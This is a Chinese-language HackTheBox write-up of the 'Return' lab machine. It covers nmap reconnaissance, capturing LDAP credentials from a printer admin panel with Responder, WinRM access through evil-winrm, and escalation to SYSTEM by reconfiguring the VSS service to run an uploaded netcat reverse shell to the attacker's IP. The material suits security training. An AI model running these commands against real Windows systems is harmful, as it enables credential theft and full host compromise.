title: HackTheBox-Return author: Mosaic Theory layout: true categories: 漏洞实验 tags:
-
• 打靶日记
To be both a speaker of words and a doer of deeds.
既当演说家,又做实干家。
HackTheBox-Return
Recon:
Nmap scan report for return.htb (10.10.11.108)
Host is up (0.36s latency).
Not shown: 65509 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: HTB Printer Admin Panel
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-05-15 14:51:01Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49682/tcp open msrpc Microsoft Windows RPC
49690/tcp open msrpc Microsoft Windows RPC
49694/tcp open msrpc Microsoft Windows RPC
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 18m34s
| smb2-time:
| date: 2022-05-15T14:52:00
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 857.68 seconds
Port 53:
>> dig axfr @10.10.11.108 return.local
; <<>> DiG 9.18.1-1-Debian <<>> axfr @10.10.11.108 return.local
; (1 server found)
;; global options: +cmd
; Transfer failed.
Port 80 :
密码我试着改,没成功提示也没返回提示,而我输入的是五个字符admin,提交之后变成了7个*,不过是用PHP开发的WEB管理页面:
POST /settings.php HTTP/1.1
Host: return.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
Origin: http://return.htb
DNT: 1
Connection: close
Referer: http://return.htb/settings.php
Upgrade-Insecure-Requests: 1
ip=printer.return.local
我提交的密码并不会出现在数据包中,我可以尝试把IP改成自己的,然后开启嗅探:
>> sudo responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.1.0
Author: Laurent Gaffie ([email protected])
To kill this script hit CTRL-C
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.6]
Responder IPv6 [dead:beef:4::1004]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Listening for events...
Port 139,445:
>> crackmapexec smb 10.10.11.108 --shares -u svc-printer -p '1edFg43012!!'
SMB 10.10.11.108 445 PRINTER [*] Windows 10.0 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
SMB 10.10.11.108 445 PRINTER [+] return.localsvc-printer:1edFg43012!!
SMB 10.10.11.108 445 PRINTER [+] Enumerated shares
SMB 10.10.11.108 445 PRINTER Share Permissions Remark
SMB 10.10.11.108 445 PRINTER ----- ----------- ------
SMB 10.10.11.108 445 PRINTER ADMIN$ READ Remote Admin
SMB 10.10.11.108 445 PRINTER C$ READ,WRITE Default share
SMB 10.10.11.108 445 PRINTER IPC$ READ Remote IPC
SMB 10.10.11.108 445 PRINTER NETLOGON READ Logon server share
SMB 10.10.11.108 445 PRINTER SYSVOL READ Logon server share
都是默认共享。
Port 135:
>> rpcclient //10.10.11.108/ -U svc-printer
Cannot connect to server. Error was NT_STATUS_UNSUCCESSFUL
Rpc不让连。
Port 5985:
>> crackmapexec winrm 10.10.11.108 -u svc-printer -p '1edFg43012!!'
SMB 10.10.11.108 5985 PRINTER [*] Windows 10.0 Build 17763 (name:PRINTER) (domain:return.local)
HTTP 10.10.11.108 5985 PRINTER [*] http://10.10.11.108:5985/wsman
WINRM 10.10.11.108 5985 PRINTER [+] return.localsvc-printer:1edFg43012!! (Pwn3d!)
>> evil-winrm -i 10.10.11.108 -u svc-printer -p '1edFg43012!!'
Evil-WinRM shell v3.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:Userssvc-printerDocuments> cd ~
*Evil-WinRM* PS C:Userssvc-printer> ls
Directory: C:Userssvc-printer
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 5/26/2021 2:05 AM Desktop
d-r--- 5/26/2021 1:51 AM Documents
d-r--- 9/15/2018 12:19 AM Downloads
d-r--- 9/15/2018 12:19 AM Favorites
d-r--- 9/15/2018 12:19 AM Links
d-r--- 9/15/2018 12:19 AM Music
d-r--- 9/15/2018 12:19 AM Pictures
d----- 9/15/2018 12:19 AM Saved Games
d-r--- 9/15/2018 12:19 AM Videos
*Evil-WinRM* PS C:Userssvc-printer> cd Desktop
*Evil-WinRM* PS C:Userssvc-printerDesktop> ls
Directory: C:Userssvc-printerDesktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 5/15/2022 8:29 AM 34 user.txt
*Evil-WinRM* PS C:Userssvc-printerDesktop> type user.txt
fe9...............................
这账户权限很高,加载恶意驱动,备份转储哈希:
*Evil-WinRM* PS C:Userssvc-printerDesktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemtimePrivilege Change the system time Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
*Evil-WinRM* PS C:Userssvc-printerDesktop>
*Evil-WinRM* PS C:Userssvc-printerDesktop> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTINServer Operators Alias S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTINPrint Operators Alias S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTINRemote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTINUsers Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTINPre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYNETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYAuthenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYThis Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYNTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory LabelHigh Mandatory Level Label S-1-16-12288
创建个恶意服务就可以轻松获取系统权限:
*Evil-WinRM* PS C:Userssvc-printerDocuments> CD C:programdata
*Evil-WinRM* PS C:programdata> upload /home/mosaictheory/Tools/n
/home/mosaictheory/Tools/nc /home/mosaictheory/Tools/nmapscripts.list
*Evil-WinRM* PS C:programdata> upload /home/mosaictheory/Tools/nc/nc
/home/mosaictheory/Tools/nc/nc.exe /home/mosaictheory/Tools/nc/nc64.exe
*Evil-WinRM* PS C:programdata> upload /home/mosaictheory/Tools/nc/nc64.exe
Info: Uploading /home/mosaictheory/Tools/nc/nc64.exe to C:programdatanc64.exe
Data: 60360 bytes of 60360 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:programdata> sc.exe config VSS binpath="C:windowssystem32cmd.exe /c C:programdatanc64.exe -e cmd 10.10.16.6 9001"
[SC] ChangeServiceConfig SUCCESS
*Evil-WinRM* PS C:programdata> sc.exe start VSS
C:UsersAdministrator>cd Desktop
cd Desktop
C:UsersAdministratorDesktop>type root.txt
type root.txt
4f6....................................
原文始发于微信公众号(老鑫安全):HackTheBox-Return
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论